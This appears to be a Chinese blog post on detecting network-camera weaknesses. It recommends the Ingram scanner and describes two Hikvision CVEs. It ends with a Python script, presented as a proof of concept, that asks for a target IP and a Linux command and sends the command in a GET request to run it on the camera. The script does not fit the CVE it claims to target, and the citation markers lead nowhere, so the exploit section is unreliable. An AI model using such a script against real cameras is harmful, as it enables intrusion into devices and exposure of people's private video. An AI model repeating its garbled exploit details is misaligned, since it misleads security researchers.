摄像头漏洞检测

学校、商场、咖啡厅甚至一些家庭,这些设备维护不够完善的地方,总会存在网络安全隐患。对于网络摄像头设备,安全性显得尤为重要,因为它会泄露我们的隐私。然而总会有些人因为懒得打补丁,或者是使用弱口令导致摄像头被黑客造访,变成了现场直播。

这个开源的项目:Ingram 可以帮助我们快速检测网段中的摄像头设备是否存在漏洞或者弱口令问题。以便于及时修复,避免造成损失。

严厉声明:该项目仅供学习与安全检测,请大家心存正义,切勿用于非法用途。

安装:

git clone https://github.com/jorhelp/Ingram.git
cd Ingram
pip install -r requirements.txt

使用方式以及参数设置参考github

运行截图:

结果csv文件:

 运行过程中生成的摄像头快照:

 

### 关于海康威视摄像头安全漏洞 #### CVE-2017-7921 此漏洞涉及海康威视设备中的一个安全隐患,允许未经授权的访问者通过特定方式获取敏感数据或控制权限。该漏洞通常可以通过网络扫描工具(如FOFA)来识别目标设备并测试其是否存在已知漏洞[^1]。 #### CVE-2021-36260 这是一个更为严重的远程代码执行漏洞,存在于海康威视IP摄像机和NVR设备的固件中。由于输入参数校验不足,攻击者能够无需身份验证的情况下向受影响设备发送特制的数据包,从而触发远程命令执行行为。这一问题广泛影响多个版本的网络摄像头产品及其关联录像存储装置[^2]。 针对上述提到的CVE编号之一即`CVE-2021-36260`, 开发人员提供了相应的Python脚本作为概念证明(PoC),用于检测哪些系统可能受到威胁。有兴趣的研究员可以从指定链接下载相关文件进行学习研究[^3]: ```python import requests from urllib.parse import quote_plus def exploit(target_ip, command="id"): url = f"http://{target_ip}/system.ini?cmd={quote_plus(command)}" response = requests.get(url) if response.status_code == 200 and 'error' not in response.text.lower(): print(f"[+] Command executed successfully:\n{response.text}") else: print("[-] Failed to execute the provided command.") if __name__ == "__main__": target = input("[*] Enter Target IP Address: ") cmd = input("[*] Enter Your Desired Linux Command (default=id): ") or "id" try: exploit(target, cmd) except Exception as e: print(f"An error occurred during exploitation attempt: {e}") ``` 以上代码片段展示了如何构建URL字符串并通过GET请求尝试利用存在缺陷的服务接口达成任意指令运行的目的。请注意实际操作前需获得合法授权以免触犯法律条款。
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值